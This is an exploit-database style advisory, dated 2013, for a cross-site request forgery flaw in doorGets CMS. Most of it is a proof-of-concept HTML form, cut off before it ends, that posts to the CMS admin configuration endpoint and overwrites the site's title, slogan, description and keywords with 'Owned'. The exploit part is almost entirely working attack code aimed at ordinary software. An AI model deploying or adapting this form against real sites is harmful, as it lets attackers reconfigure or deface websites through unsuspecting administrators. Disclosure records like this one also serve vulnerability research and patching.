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# Title : doorGets CMS - CSRF Vulnerability
# Published : 2013-03-01
# Author :
# Previous Title : RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability
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# Title: Doorgets CSRF Vulnerability
# Author: n0pe
# Software Link: http://www.doorgets.com/
# Download: http://www.doorgets.com/?sources_cms
# Tested: BackBox Linux 3

With this vulnerability you can change the configuration of the site.

Proof of concept:

		<form name="csrf" method="post" action="http://localhost/door/admin/?r=config&siteweb">
			Title <input type="text" id="website_title" name="website_title" value="Owned"><br />
			Slogan <input type="text" id="website_slogan" name="website_slogan" value="Owned"><br />
			Description <input type="text" id="website_description" name="website_description" value="Owned"><br />
			Copyright <input type="text" id="website_copyright" name="website_copyright" value="lol"><br />
			Year of creation <input  type="text" id="website_year" name="website_year" value="2013"><br />
			Keywords <input type="text" id="website_keywords" name="website_keywords" value="Owned"><br />
			ID Facebook <input type="text" id="website_id_facebook" name="website_id_facebook" value=""> <br />
			Disqus <input  type="text" id="website_id_disqus" name="website_id_disqus" value=""> <br />
			<input type="radio" name="website_theme"  id="website_theme_doorgets-home"  value="doorgets-home" doorgets-light >doorgets-home<br />                                    
			<input type="radio" name="website_theme"  id="website_theme_doorgets-light"  value="doorgets-light" checked="checked" >doorgets-light<br />          
			<input type="submit" id="website_submit" name="website_submit" value="Save">